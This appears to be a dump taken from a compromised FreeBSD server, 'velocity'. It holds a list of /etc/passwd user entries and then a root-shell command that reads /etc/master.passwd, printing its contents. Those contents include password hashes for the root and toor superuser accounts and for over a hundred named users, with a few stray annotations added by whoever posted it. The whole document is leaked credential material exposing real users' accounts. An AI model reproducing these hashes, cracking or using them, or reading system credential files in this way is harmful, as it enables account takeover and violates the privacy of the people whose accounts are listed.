tlm:*:1049:1049:User &:/home/tlm:/usr/local/bin/bash
|
||
itzkorn:*:1051:1051:User &:/home/itzkorn:/usr/local/bin/bash
|
||
groove:*:1052:1052:User &:/home/groove:/usr/local/bin/bash
|
||
en0prcv:*:1054:1054:User &:/home/en0prcv:/usr/local/bin/bash
|
||
poolboy:*:1055:1055:User &:/home/poolboy:/usr/local/bin/bash
|
||
bollox:*:1058:1058:User &:/home/bollox:/usr/local/bin/bash
|
||
vamp:*:1059:1059:User &:/home/vamp:/usr/local/bin/bash
|
||
genosyde:*:1060:1060:User &:/home/genosyde:/usr/local/bin/bash
|
||
y2j:*:1061:1061:User &:/home/y2j:/usr/local/bin/bash
|
||
katsst:*:1062:1062:User &:/home/katsst:/usr/local/bin/bash
|
||
nexxtea:*:1063:1063:User &:/home/nexxtea:/usr/local/bin/bash
|
||
quinn:*:1064:1064:User &:/home/quinn:/usr/local/bin/bash
|
||
crash:*:1066:1066:User &:/home/crash:/usr/local/bin/bash
|
||
safety:*:1067:1067:User &:/home/safety:/usr/local/bin/bash
|
||
crazyl:*:1069:1069:User &:/home/crazyl:/usr/local/bin/bash
|
||
tarawa:*:1071:1071:User &:/home/tarawa:/usr/local/bin/bash
|
||
athemp:*:1077:1077:User &:/home/athemp:/usr/local/bin/bash
|
||
cazz1961:*:1087:1087:User &:/home/cazz1961:/usr/local/bin/bash
|
||
vitalrbj:*:1088:1088:User &:/home/vitalrbj:/usr/local/bin/bash
|
||
digitalman:*:1090:1090:User &:/home/digitalman:/usr/local/bin/bash
|
||
timgor:*:1096:1096:User &:/home/timgor:/usr/local/bin/bash
|
||
techi3:*:1098:1098:User &:/home/techi3:/usr/local/bin/bash
|
||
apo:*:1099:1099:User &:/home/apo:/usr/local/bin/bash
|
||
blkgraz:*:1100:1100:User &:/home/blkgraz:/usr/local/bin/bash
|
||
jamesn:*:1101:1101:User &:/home/jamesn:/usr/local/bin/bash
|
||
sacred:*:1103:1103:User &:/home/sacred:/usr/local/bin/bash
|
||
jschultk:*:1104:1104:User &:/home/jschultk:/usr/local/bin/bash
|
||
narcissu:*:1105:1105:User &:/home/narcissu:/usr/local/bin/bash
|
||
neohax:*:1115:1115:User &:/home/neohax:/usr/local/bin/bash
|
||
ceejay:*:1119:1119:User &:/home/ceejay:/usr/local/bin/bash
|
||
wolf:*:1126:1126:User &:/home/wolf:/usr/local/bin/bash
|
||
warlordz:*:1129:1129:User &:/home/warlordz:/usr/local/bin/bash
|
||
hh360:*:1130:1130:User &:/home/hh360:/usr/local/bin/bash
|
||
simonbh:*:1133:1133:User &:/home/simonbh:/usr/local/bin/bash
|
||
crazie:*:1134:1134:User &:/home/crazie:/bin/tcsh
|
||
burnt:*:1136:1136:User &:/home/burnt:/usr/local/bin/bash
|
||
xckx:*:1139:1139:User &:/home/xckx:/bin/sh
|
||
f3d0r:*:1140:1140:User &:/home/f3d0r:/usr/local/bin/bash
|
||
khicks:*:1145:1145:User &:/home/khicks:/usr/local/bin/bash
|
||
schlomer:*:1147:1147:User &:/home/schlomer:/usr/local/bin/bash
|
||
nodex:*:1153:1153:User &:/home/nodex:/usr/local/bin/bash
|
||
crrj13:*:1155:1155:User &:/home/crrj13:/usr/local/bin/bash
|
||
dravas:*:1157:1157:User &:/home/dravas:/usr/local/bin/bash
|
||
sinistro:*:1170:1170:User &:/home/sinistro:/usr/local/bin/bash
|
||
izedd:*:1172:1172:User &:/home/izedd:/usr/local/bin/bash
|
||
chevym4n:*:1174:1174:User &:/home/chevym4n:/usr/local/bin/bash
|
||
edgein:*:1175:1175:User &:/home/edgein:/usr/local/bin/bash
|
||
shoes:*:1178:1178:User &:/home/shoes:/usr/local/bin/bash
|
||
zenchi:*:1179:1179:User &:/home/zenchi:/usr/local/bin/bash
|
||
darien9:*:1180:1180:User &:/home/darien9:/usr/local/bin/bash
|
||
reaper90:*:1181:1181:User &:/home/reaper90:/usr/local/bin/bash
|
||
bnoel:*:1183:1183:User &:/home/bnoel:/usr/local/bin/bash
|
||
hts:*:1188:1188:User &:/home/hts:/usr/local/bin/bash
|
||
hw4tbnc:*:1190:1190:User &:/home/hw4tbnc:/usr/local/bin/bash
|
||
xavi:*:1192:1192:User &:/home/xavi:/usr/local/bin/bash
|
||
kruapra:*:1193:1193:User &:/home/kruapra:/usr/local/bin/bash
|
||
bbblade1:*:1197:1197:User &:/home/bbblade1:/usr/local/bin/bash
|
||
oby1:*:1198:1198:User &:/home/oby1:/usr/local/bin/bash
|
||
ltootle:*:1199:1199:User &:/home/ltootle:/usr/local/bin/bash
|
||
zime:*:1200:1200:User &:/home/zime:/usr/local/bin/bash
|
||
ksafusi:*:1202:1202:User &:/home/ksafusi:/usr/local/bin/bash
|
||
methanl:*:1205:1205:User &:/home/methanl:/usr/local/bin/bash
|
||
anux:*:1206:1206:User &:/home/anux:/usr/local/bin/bash
|
||
tea:*:1207:1207:User &:/home/tea:/usr/local/bin/bash
|
||
ircjaymz:*:1210:1210:User &:/home/ircjaymz:/usr/local/bin/bash
|
||
coolcat:*:1211:1211:User &:/home/coolcat:/usr/local/bin/bash
|
||
zeepysea:*:1213:1213:User &:/home/zeepysea:/usr/local/bin/bash
|
||
darkevil:*:1214:1214:User &:/home/darkevil:/usr/local/bin/bash
|
||
grindey:*:1215:1215:User &:/home/grindey:/usr/local/bin/bash
|
||
silver15:*:1216:1216:User &:/home/silver15:/usr/local/bin/bash
|
||
smash:*:1218:1218:User &:/home/smash:/usr/local/bin/bash
|
||
reznik:*:1219:1219:User &:/home/reznik:/usr/local/bin/bash
|
||
omelette:*:1222:1222:User &:/home/omelette:/usr/local/bin/bash
|
||
mimik0r:*:1223:1223:User &:/home/mimik0r:/usr/local/bin/bash
|
||
owine:*:1224:1224:User &:/home/owine:/usr/local/bin/bash
|
||
manboo:*:1225:1225:User &:/home/manboo:/usr/local/bin/bash
|
||
corley:*:1231:1231:User &:/home/corley:/usr/local/bin/bash
|
||
sqd:*:1233:1233:User &:/home/sqd:/usr/local/bin/bash
|
||
mooo:*:1234:1234:User &:/home/mooo:/usr/local/bin/bash
|
||
comedy:*:1235:1235:User &:/home/comedy:/usr/local/bin/bash
|
||
lynx:*:1236:1236:User &:/home/lynx:/usr/local/bin/bash
|
||
prodigy:*:1237:1237:User &:/home/prodigy:/usr/local/bin/bash
|
||
chrirc:*:1238:1238:User &:/home/chrirc:/usr/local/bin/bash
|
||
lyhne1:*:1242:1242:User &:/home/lyhne1:/usr/local/bin/bash
|
||
percott1:*:1243:1243:User &:/home/percott1:/usr/local/bin/bash
|
||
djspark:*:1244:1244:User &:/home/djspark:/usr/local/bin/bash
|
||
ac1115:*:1246:1246:User &:/home/ac1115:/usr/local/bin/bash
|
||
asriel:*:1247:1247:User &:/home/asriel:/usr/local/bin/bash
|
||
devil:*:1248:1248:User &:/home/devil:/usr/local/bin/bash
|
||
lymelyte:*:1249:1249:User &:/home/lymelyte:/usr/local/bin/bash
|
||
cmm:*:1250:1250:User &:/home/cmm:/usr/local/bin/bash
|
||
nek0o:*:1252:1252:User &:/home/nek0o:/usr/local/bin/bash
|
||
baxxta:*:1253:1253:User &:/home/baxxta:/usr/local/bin/bash
|
||
bruhaha:*:1254:1254:User &:/home/bruhaha:/usr/local/bin/bash
|
||
dv327:*:1258:1258:User &:/home/dv327:/usr/local/bin/bash
|
||
voxitize:*:1261:1261:User &:/home/voxitize:/usr/local/bin/bash
|
||
own3d:*:1262:1262:User &:/home/own3d:/usr/local/bin/bash
|
||
feed:*:1264:1264:User &:/home/feed:/usr/local/bin/bash
|
||
yaquis:*:1266:1266:User &:/home/yaquis:/usr/local/bin/bash
|
||
bpunux:*:1269:1269:User &:/home/bpunux:/usr/local/bin/bash
|
||
skypilot:*:1271:1271:User &:/home/skypilot:/usr/local/bin/bash
|
||
blake96:*:1272:1272:User &:/home/blake96:/usr/local/bin/bash
|
||
blotch:*:1274:1274:User &:/home/blotch:/usr/local/bin/bash
|
||
scouse:*:1275:1275:User &:/home/scouse:/usr/local/bin/bash
|
||
mogle3:*:1276:1276:User &:/home/mogle3:/usr/local/bin/bash
|
||
ste:*:1277:1277:User &:/home/ste:/usr/local/bin/bash
|
||
omgwtf:*:1281:1281:User &:/home/omgwtf:/usr/local/bin/bash
|
||
brosb4:*:1283:1283:User &:/home/brosb4:/usr/local/bin/bash
|
||
mindben:*:1284:1284:User &:/home/mindben:/usr/local/bin/bash
|
||
hixk:*:1286:1286:User &:/home/hixk:/usr/local/bin/bash
|
||
omen:*:1287:1287:User &:/home/omen:/usr/local/bin/bash
|
||
sakik1:*:1290:1290:User &:/home/sakik1:/usr/local/bin/bash
|
||
chriys:*:1291:1291:User &:/home/chriys:/usr/local/bin/bash
|
||
jtracy:*:1292:1292:User &:/home/jtracy:/usr/local/bin/bash
|
||
roodyk:*:1293:1293:User &:/home/roodyk:/usr/local/bin/bash
|
||
qfx:*:1295:1295:User &:/home/qfx:/usr/local/bin/bash
|
||
chrisdad:*:1296:1296:User &:/home/chrisdad:/usr/local/bin/bash
|
||
rice21:*:1298:1298:User &:/home/rice21:/usr/local/bin/bash
|
||
wchan21:*:1299:1299:User &:/home/wchan21:/usr/local/bin/bash
|
||
xkelsx:*:1300:1300:User &:/home/xkelsx:/usr/local/bin/bash
|
||
jerryste:*:1302:1302:User &:/home/jerryste:/usr/local/bin/bash
|
||
pbx:*:1303:1303:User &:/home/pbx:/usr/local/bin/bash
|
||
mlh:*:1307:1307:User &:/home/mlh:/usr/local/bin/bash
|
||
howell1:*:1308:1308:User &:/home/howell1:/usr/local/bin/bash
|
||
djkarl:*:1309:1309:User &:/home/djkarl:/usr/local/bin/bash
|
||
subkult:*:1310:1310:User &:/home/subkult:/usr/local/bin/bash
|
||
dealer:*:1311:1311:User &:/home/dealer:/bin/sh
|
||
cont:*:1312:1312:User &:/home/cont:/usr/local/bin/bash
|
||
ircusr:*:1313:1313:User &:/home/ircusr:/usr/local/bin/bash
|
||
lordy:*:1314:1314:User &:/home/lordy:/usr/local/bin/bash
|
||
chozen1:*:1315:1315:User &:/home/chozen1:/usr/local/bin/bash
|
||
nardi:*:1316:1316:User &:/home/nardi:/usr/local/bin/bash
|
||
ssaws:*:1317:1317:User &:/home/ssaws:/usr/local/bin/bash
|
||
chaos1:*:1318:1318:User &:/home/chaos1:/usr/local/bin/bash
|
||
jax66:*:1319:1319:User &:/home/jax66:/usr/local/bin/bash
|
||
paleride:*:1320:1320:User &:/home/paleride:/usr/local/bin/bash
|
||
kokoryu:*:1321:1321:User &:/home/kokoryu:/usr/local/bin/bash
|
||
bluewish:*:1322:1322:User &:/home/bluewish:/usr/local/bin/bash
|
||
grumpy:*:1323:1323:User &:/home/grumpy:/usr/local/bin/bash
|
||
jaiven:*:1324:1324:jusam69:/home/jaiven:/usr/local/bin/bash
|
||
rikt:*:1325:1325:User &:/home/rikt:/usr/local/bin/bash
|
||
sal:*:1326:1326:User &:/home/sal:/usr/local/bin/bash
|
||
lailoke:*:1327:1327:User &:/home/lailoke:/usr/local/bin/bash
|
||
kingzy:*:1328:1328:User &:/home/kingzy:/usr/local/bin/bash
|
||
delion1:*:1329:1329:User &:/home/delion1:/usr/local/bin/bash
|
||
vietnigh:*:1330:1330:User &:/home/vietnigh:/usr/local/bin/bash
|
||
darkuno3:*:1331:1331:User &:/home/darkuno3:/usr/local/bin/bash
|
||
mae21:*:1332:1332:User &:/home/mae21:/usr/local/bin/bash
|
||
redrum:*:1333:1333:User &:/home/redrum:/usr/local/bin/bash
|
||
cpu:*:1334:1334:User &:/home/cpu:/usr/local/bin/bash
|
||
cassand:*:1335:1335:User &:/home/cassand:/usr/local/bin/bash
|
||
nyakz:*:1336:1336:User &:/home/nyakz:/usr/local/bin/bash
|
||
ioplex:*:1337:1337:User &:/home/ioplex:/usr/local/bin/bash
|
||
dasboot:*:1338:1338:User &:/home/dasboot:/usr/local/bin/bash
|
||
visage:*:1339:1339:User &:/home/visage:/usr/local/bin/bash
|
||
brosco:*:1340:1340:User &:/home/brosco:/usr/local/bin/bash
|
||
mrts:*:1341:1341:User &:/home/mrts:/usr/local/bin/bash
|
||
qberto:*:1342:1342:User &:/home/qberto:/usr/local/bin/bash
|
||
kooner:*:1343:1343:User &:/home/kooner:/usr/local/bin/bash
|
||
matt:*:1344:1344:User &:/home/matt:/usr/local/bin/bash
|
||
alexbb:*:1345:1345:User &:/home/alexbb:/usr/local/bin/bash
|
||
psycoz:*:1346:1346:User &:/home/psycoz:/usr/local/bin/bash
|
||
brex132:*:1347:1347:User &:/home/brex132:/usr/local/bin/bash
|
||
romeo:*:1348:1348:User &:/home/romeo:/usr/local/bin/bash // Luv birdz
|
||
pimpinjg:*:1349:1349:pimp:/home/pimpinjg:/usr/local/bin/bash xxx
|
||
|
||
[root@velocity:/var/run]# cat /etc/master.passwd
|
||
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
|
||
#
|
||
root:$1$1/uC7r58$sAPSn.PUGsvyFIu4mcOIF.:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
|
||
toor:$1$IuvLkk7/$FgGjVLe5lsy07I5kDUC/T0:0:0::0:0:Bourne-again Superuser:/root:
|
||
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
|
||
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
|
||
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
|
||
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
|
||
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
|
||
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
|
||
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
|
||
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
|
||
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
|
||
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
|
||
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
|
||
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
|
||
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
|
||
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
|
||
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
|
||
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
|
||
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
|
||
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
|
||
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||
nsc:$1$IeIWCi46$XUYbzB6VMUjyo3yVDocI20:1001:0::0:0:User &:/home/nsc:/bin/sh
|
||
sysc:$1$hiSG4Zk5$DRLSxZFui5GLPwdZoHRXa/:1002:1002::0:0:User &:/home/sysc:/usr/local/bin/bash
|
||
vividbreeze:$1$HHTt39fS$BpffLFLjdrdFhiYRiT/oH1:1003:1003::0:0:User &:/home/vividbreeze:/usr/local/bin/bash
|
||
sharpie:$1$Z/fby1iX$U.ENzMwNSk.Ak1eEo8cdo1:1036:1036::0:0:User &:/home/sharpie:/usr/local/bin/bash
|
||
cappy57:$1$8gQtMpSY$4g39UeywbkYfv4t.BC1T0.:1038:1038::0:0:User &:/home/cappy57:/usr/local/bin/bash
|
||
zoo:$1$ikC.1RVM$vaW3geI2tKDiBuvM7/8H1/:1039:1039::0:0:User &:/home/zoo:/usr/local/bin/bash
|
||
dark:$1$sGGpg4L4$HYL2DV2DDtJrlDCsIk1fD0:1041:1041::0:0:User &:/home/dark:/usr/local/bin/bash
|
||
evino:$1$HDrVvLQn$D1cJvyXZzYWc71dnlB9jl.:1042:1042::0:0:User &:/home/evino:/usr/local/bin/bash
|
||
dano30:$1$ilxeqeAX$1.xdaXswIvjWdH4Es8U1U1:1043:1043::0:0:User &:/home/dano30:/usr/local/bin/bash
|
||
daali:$1$RIGXxrvu$loyclkpc.AmaZJ6z7RycD0:1044:1044::0:0:User &:/home/daali:/usr/local/bin/bash
|
||
skit:$1$YwEZ2Gg3$Mm9v5oPJpRUj5WbHGfiYI.:1045:1045::0:0:User &:/home/skit:/usr/local/bin/bash
|
||
l33t:$1$BuBrfoCp$YgayOH.nAWmkTT.kOi0340:1047:1047::0:0:User &:/home/l33t:/usr/local/bin/bash
|
||
tlm:$1$8qySBjLd$UvMl1Qi37S6HzW5.fgugN.:1049:1049::0:0:User &:/home/tlm:/usr/local/bin/bash
|
||
itzkorn:$1$WvELNoD3$FIKMODlyhN1RIxuNyM8gV0:1051:1051::0:0:User &:/home/itzkorn:/usr/local/bin/bash
|
||
groove:$1$U.nL9FBx$mxac7bOw5AcjMobjytLqT.:1052:1052::0:0:User &:/home/groove:/usr/local/bin/bash
|
||
en0prcv:$1$ml9.a1tV$4ysE/.CdLiEAYOtG6IzW2.:1054:1054::0:0:User &:/home/en0prcv:/usr/local/bin/bash
|
||
poolboy:$1$A5NPQSxN$X./Geraa6C3fLjbGv2j9h.:1055:1055::0:0:User &:/home/poolboy:/usr/local/bin/bash
|
||
bollox:$1$1CezJarC$OZn7O/jcjFQHzMxK80L0C0:1058:1058::0:0:User &:/home/bollox:/usr/local/bin/bash
|
||
vamp:$1$OdDSbp3S$VEOws1l9o/qV0i6Y2xiHC1:1059:1059::0:0:User &:/home/vamp:/usr/local/bin/bash
|
||
genosyde:$1$izdrjKv1$qyo9BMhEB0kCGUinWl/dr1:1060:1060::0:0:User &:/home/genosyde:/usr/local/bin/bash
|
||
y2j:$1$bzHRbq3a$04iFxtmEVuPEXbClBbUIM.:1061:1061::0:0:User &:/home/y2j:/usr/local/bin/bash
|
||
katsst:$1$XkKWd/C/$gu0Kf6fWZZylSX2kvZP0y/:1062:1062::0:0:User &:/home/katsst:/usr/local/bin/bash
|
||
nexxtea:$1$qiplCuym$aOcIJrBN7.ahK8fRpc5F.1:1063:1063::0:0:User &:/home/nexxtea:/usr/local/bin/bash
|
||
quinn:$1$WjY3BCta$pOR9R53lRcsn9uMHRj5mO.:1064:1064::0:0:User &:/home/quinn:/usr/local/bin/bash
|
||
crash:$1$ptyaMrnL$LfpP.5IoEVl6ASBLrZ7sw0:1066:1066::0:0:User &:/home/crash:/usr/local/bin/bash
|
||
safety:$1$IdkZ.lW5$31zeswPr/v9Gwn6qZTDt3.:1067:1067::0:0:User &:/home/safety:/usr/local/bin/bash
|
||
crazyl:$1$b6KKD5V2$0X.DEpoT8dnAV.2tkkSSQ/:1069:1069::0:0:User &:/home/crazyl:/usr/local/bin/bash
|
||
tarawa:$1$kogmLs28$TVHG.5aER1x3a/6fks6fv1:1071:1071::0:0:User &:/home/tarawa:/usr/local/bin/bash
|
||
athemp:*LOCKED*$1$yNQrxvZa$ndX97oZnZ.P29pYdLUDUX1:1077:1077::0:0:User &:/home/athemp:/usr/local/bin/bash
|
||
cazz1961:$1$tNbxmjSZ$0nG7YCqOLZZBu.rdFYNXg1:1087:1087::0:0:User &:/home/cazz1961:/usr/local/bin/bash
|
||
vitalrbj:$1$obXp9UmW$ASCrtvpO6SSYxAtC9/BgN1:1088:1088::0:0:User &:/home/vitalrbj:/usr/local/bin/bash
|
||
digitalman:$1$.uafD1mk$ZKCSAxQX05Bt8CR1vD0bI.:1090:1090::0:0:User &:/home/digitalman:/usr/local/bin/bash
|
||
timgor:$1$fV/Hdpqj$2sjgaBZs6L4cWkD8coayp1:1096:1096::0:0:User &:/home/timgor:/usr/local/bin/bash
|
||
techi3:$1$ynI1L3YX$lTwOx8CeuiBAbtCq2rXG2.:1098:1098::0:0:User &:/home/techi3:/usr/local/bin/bash
|
||
apo:$1$lgsvmKYS$kJ/vrigrNVEXtw8V3qA3K/:1099:1099::0:0:User &:/home/apo:/usr/local/bin/bash
|
||
blkgraz:$1$5q0v8Hnd$zACUwgVPinssVcu8I8Ouf0:1100:1100::0:0:User &:/home/blkgraz:/usr/local/bin/bash
|
||
jamesn:$1$0ZLHnfT0$mF2GuCKO5WcYOceupFee0/:1101:1101::0:0:User &:/home/jamesn:/usr/local/bin/bash
|
||
sacred:*LOCKED*$1$QBsL9qE8$9gAsuW0OK2OH2.UfBBD4n/:1103:1103::0:0:User &:/home/sacred:/usr/local/bin/bash
|
||
jschultk:$1$Ghq0DYN4$XO2MmdjnPzIkQT0nWFNi.0:1104:1104::0:0:User &:/home/jschultk:/usr/local/bin/bash
|
||
narcissu:$1$yPWcgSV9$K6b21WLz8VeolcK9x26mW1:1105:1105::0:0:User &:/home/narcissu:/usr/local/bin/bash
|
||
neohax:$1$BYHxfesg$7Vu8ktsSVk6FGgSMczVQG.:1115:1115::0:0:User &:/home/neohax:/usr/local/bin/bash
|
||
ceejay:*LOCKED*$1$sDhV37Ee$hKD5Ycjby19mEG3NYYIYo0:1119:1119::0:0:User &:/home/ceejay:/usr/local/bin/bash
|
||
wolf:$1$.MGFDwFE$jy3l9ohTEH1ykRgpGM1Q6.:1126:1126::0:0:User &:/home/wolf:/usr/local/bin/bash
|
||
warlordz:$1$uvxD1gWl$4fRmw..Z.wViXzw28Jlmu1:1129:1129::0:0:User &:/home/warlordz:/usr/local/bin/bash
|
||
hh360:$1$BRAG0RtG$iXnTwrCohVK8HOGAJohy10:1130:1130::0:0:User &:/home/hh360:/usr/local/bin/bash
|
||
simonbh:$1$97E2uBin$73LaITM/WELCrMAt682Z21:1133:1133::0:0:User &:/home/simonbh:/usr/local/bin/bash
|
||
crazie:$1$myYGtQTs$U52cfuiCDyksyWJbM55dx.:1134:1134::0:0:User &:/home/crazie:/bin/tcsh
|
||
burnt:$1$ykBWG.ZC$dfTn3m8koWfmAY1QHpx1R0:1136:1136::0:0:User &:/home/burnt:/usr/local/bin/bash
|
||
xckx:*LOCKED*$1$7mjlMrC7$j/ZtDnWpTeAgxJl4jrPPV1:1139:1139::0:0:User &:/home/xckx:/bin/sh
|
||
f3d0r:*LOCKED*$1$9K1FP6Bz$KDznsL2Eh9l3ljez.qoif/:1140:1140::0:0:User &:/home/f3d0r:/usr/local/bin/bash
|
||
khicks:$1$VzHaJyrH$0m/NnKHiTrFY..8zhbaLq0:1145:1145::0:0:User &:/home/khicks:/usr/local/bin/bash
|
||
schlomer:*LOCKED*$1$iBBpx5BZ$LjFBxe10UsUGETx8AZfiP0:1147:1147::0:0:User &:/home/schlomer:/usr/local/bin/bash
|
||
nodex:$1$Q518nSu7$4WszHno7Bi4NymOySGq1a0:1153:1153::0:0:User &:/home/nodex:/usr/local/bin/bash
|
||
crrj13:$1$m4PUs5Ia$3tsRV7DZyj3fLxjHK9.AX0:1155:1155::0:0:User &:/home/crrj13:/usr/local/bin/bash
|
||
dravas:$1$hTXK1nl7$0WoSi2Md.l7h/eM2uQCp5.:1157:1157::0:0:User &:/home/dravas:/usr/local/bin/bash
|
||
sinistro:$1$rt7kcwvQ$xe2ixfObxehOHLzoILyVF.:1170:1170::0:0:User &:/home/sinistro:/usr/local/bin/bash
|
||
izedd:*LOCKED*$1$D5UKCjr0$e9soJXXTyUG1Xf5eHHDuZ/:1172:1172::0:0:User &:/home/izedd:/usr/local/bin/bash
|
||
chevym4n:$1$K1uoGWl/$rZLwDgLIgr.Xni315uVpX.:1174:1174::0:0:User &:/home/chevym4n:/usr/local/bin/bash
|
||
edgein:$1$2Vs.w9gS$mvylnKn4jxg6lsitAbz.i.:1175:1175::0:0:User &:/home/edgein:/usr/local/bin/bash
|
||
shoes:$1$e.WxvF9e$UR5G4Q4zBbgMYaRcvKR3L/:1178:1178::0:0:User &:/home/shoes:/usr/local/bin/bash
|
||
zenchi:$1$4YSeHXDW$0/Y40Q9iuLRgd0IJKQucc.:1179:1179::0:0:User &:/home/zenchi:/usr/local/bin/bash
|
||
darien9:$1$vzP7ScLf$c/x7.w4a8hLqcy/cm.3uk1:1180:1180::0:0:User &:/home/darien9:/usr/local/bin/bash
|
||
reaper90:*LOCKED*$1$RdwnqlVZ$u0yfgSk8FCTKkzDb.n3gM1:1181:1181::0:0:User &:/home/reaper90:/usr/local/bin/bash
|
||
bnoel:$1$drKh3ET3$.V5pp0CrLCNjMiPuKJxnY1:1183:1183::0:0:User &:/home/bnoel:/usr/local/bin/bash
|
||
hts:$1$84Ss/lv8$b51Gx1URnSeNK63ZO8kNZ1:1188:1188::0:0:User &:/home/hts:/usr/local/bin/bash
|
||
hw4tbnc:$1$Vh3/g6US$cPnpGhNkNG9BWvCQ3t2Yz/:1190:1190::0:0:User &:/home/hw4tbnc:/usr/local/bin/bash
|
||
xavi:$1$9xxNvzQF$drSUfEtQS.QXN1BbuSZAQ/:1192:1192::0:0:User &:/home/xavi:/usr/local/bin/bash
|
||
kruapra:$1$Nbcjv9YC$N8ePQ6PSdQHF0U/DKkrkh0:1193:1193::0:0:User &:/home/kruapra:/usr/local/bin/bash
|
||
bbblade1:$1$3QdkfReN$LAGYA1xhqAuhcTw0fJWsl0:1197:1197::0:0:User &:/home/bbblade1:/usr/local/bin/bash
|
||
oby1:$1$GkQaLc30$6DXwEhSd9QSeDF5FjAVTB0:1198:1198::0:0:User &:/home/oby1:/usr/local/bin/bash
|
||
ltootle:$1$QGrHDsUo$Wl.6N3Nm9ev1dK58x.e80/:1199:1199::0:0:User &:/home/ltootle:/usr/local/bin/bash
|
||
zime:$1$uiS1oy.Q$WiVC7b9esN7u4IQw9qrsl0:1200:1200::0:0:User &:/home/zime:/usr/local/bin/bash
|
||
ksafusi:$1$hEuXZPjD$AxW7YdBYaTfraRpTuLhhs.:1202:1202::0:0:User &:/home/ksafusi:/usr/local/bin/bash
|
||
methanl:$1$DDefrWsW$uVtJKR20EYhnrGhL2lgAM0:1205:1205::0:0:User &:/home/methanl:/usr/local/bin/bash
|
||
anux:$1$MjMKgFJP$Db/H.GWM0F4V8y6aESFx9/:1206:1206::0:0:User &:/home/anux:/usr/local/bin/bash
|
||
tea:$1$XsdcVMWd$6zKH0gChUzxwFW9JWohhU0:1207:1207::0:0:User &:/home/tea:/usr/local/bin/bash
|
||
ircjaymz:$1$OQn.DXif$.CQTkWt2WMacpsLiIzTFN/:1210:1210::0:0:User &:/home/ircjaymz:/usr/local/bin/bash
|
||
coolcat:$1$Oylm8zdT$1fJ9FuOxsLixvN0Mvi7gv1:1211:1211::0:0:User &:/home/coolcat:/usr/local/bin/bash
|
||
zeepysea:$1$3eGKEHR9$zOgqVHLQHdZVHWxVuNJZG0:1213:1213::0:0:User &:/home/zeepysea:/usr/local/bin/bash
|
||
darkevil:$1$45g22hpl$DdFBwycNzL3o9D./PKHzf1:1214:1214::0:0:User &:/home/darkevil:/usr/local/bin/bash
|
||
grindey:$1$.Y3kkIHc$kKp8DefYIdeekSzixAV4f0:1215:1215::0:0:User &:/home/grindey:/usr/local/bin/bash
|
||
silver15:$1$tb0VvKDF$c0SYfPvgceRpkYvTeLE43/:1216:1216::0:0:User &:/home/silver15:/usr/local/bin/bash
|
||
smash:$1$jNnzzwU.$p5P3qiiQdK8fh22y8pM2k.:1218:1218::0:0:User &:/home/smash:/usr/local/bin/bash
|
||
reznik:$1$NB.AbeQB$woH82mNch0lgffXyGchAU/:1219:1219::0:0:User &:/home/reznik:/usr/local/bin/bash
|
||
omelette:*LOCKED*$1$XN1bbL.7$oThuyRVmG09RvI02.4C1I0:1222:1222::0:0:User &:/home/omelette:/usr/local/bin/bash
|
||
mimik0r:$1$0XSPv6Su$ZwaXxxlJYHS97/pdN0oy90:1223:1223::0:0:User &:/home/mimik0r:/usr/local/bin/bash
|
||
owine:$1$wxGmMtzO$Z3thy5JIjzaffvKpPG9WI/:1224:1224::0:0:User &:/home/owine:/usr/local/bin/bash
|
||
manboo:$1$N2gCSmE3$yk.dcCPMq6Y1/ezAac7wu0:1225:1225::0:0:User &:/home/manboo:/usr/local/bin/bash
|
||
corley:$1$PvKjpEEr$Vo37apBxJ3eqZqB8OLfaT.:1231:1231::0:0:User &:/home/corley:/usr/local/bin/bash
|
||
sqd:$1$OZvYdPVR$FmfB6RtJAzTp1oGmdMCCp1:1233:1233::0:0:User &:/home/sqd:/usr/local/bin/bash
|
||
mooo:$1$zEP5oqSf$UbHTr1.JzIn0ey0.DAGn21:1234:1234::0:0:User &:/home/mooo:/usr/local/bin/bash
|
||
comedy:$1$z6LpAT1A$nc1/vuEvWdaP/cLqkowCs.:1235:1235::0:0:User &:/home/comedy:/usr/local/bin/bash
|
||
lynx:$1$se6yc6Bo$.LQ7e0Q01u3rYovysJR3h1:1236:1236::0:0:User &:/home/lynx:/usr/local/bin/bash
|
||
prodigy:$1$RVyb9n7n$.xCux6MDqOIdqJ0st2KOb1:1237:1237::0:0:User &:/home/prodigy:/usr/local/bin/bash
|
||
chrirc:$1$2JCsvlHc$i/CQOaTf5gEpM7oFCjDN/.:1238:1238::0:0:User &:/home/chrirc:/usr/local/bin/bash
|
||
lyhne1:$1$Kpsj2jtT$sjUGo/h4J2FIkuoqishrw/:1242:1242::0:0:User &:/home/lyhne1:/usr/local/bin/bash
|
||
percott1:$1$BjzcMqbu$i3/MQucqGMtCREAcP7W65.:1243:1243::0:0:User &:/home/percott1:/usr/local/bin/bash
|
||
djspark:$1$c6xQdKTb$mWggScCvJZiwkdnzpx/Cp/:1244:1244::0:0:User &:/home/djspark:/usr/local/bin/bash
|
||
ac1115:$1$XsglBGxw$DyTzTnNO0mOsflnamAukf0:1246:1246::0:0:User &:/home/ac1115:/usr/local/bin/bash
|
||
